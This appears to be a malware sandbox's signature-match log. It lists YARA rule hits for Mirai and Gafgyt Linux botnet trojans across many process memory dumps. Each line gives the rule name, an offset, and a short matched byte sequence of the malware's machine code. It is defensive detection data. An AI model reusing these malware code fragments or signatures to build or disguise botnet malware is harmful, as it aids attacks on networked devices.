6605.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6605.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6605.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6605.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6605.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6605.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6586.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6586.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6586.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6586.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6586.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6586.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6586.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6566.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6566.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6566.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6566.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6566.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6566.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6566.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6491.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6491.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6491.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6491.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6491.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6491.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6491.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6458.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6458.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6458.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6458.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6458.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6458.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6458.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6445.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6445.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6445.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6445.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6445.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6445.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6445.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6443.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6443.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6443.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6443.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6443.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6443.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6443.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6444.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6444.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6444.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6444.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6444.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6444.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6444.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6530.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6530.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6530.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6530.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6530.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6530.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6530.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6597.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6597.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6597.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6597.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6597.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6597.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6597.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6599.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6599.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6599.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6599.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6599.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6599.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6599.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6563.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6563.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6563.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6563.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6563.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6563.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6563.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6564.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6564.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6564.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6564.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6564.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6564.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6564.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6593.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6593.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6593.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6593.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6593.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6593.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6593.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6574.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6574.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6574.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6574.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6574.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6574.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6574.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6555.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6555.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6555.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6555.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6555.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6555.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6555.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6442.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6442.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6442.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6442.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6442.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6442.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6442.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6521.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
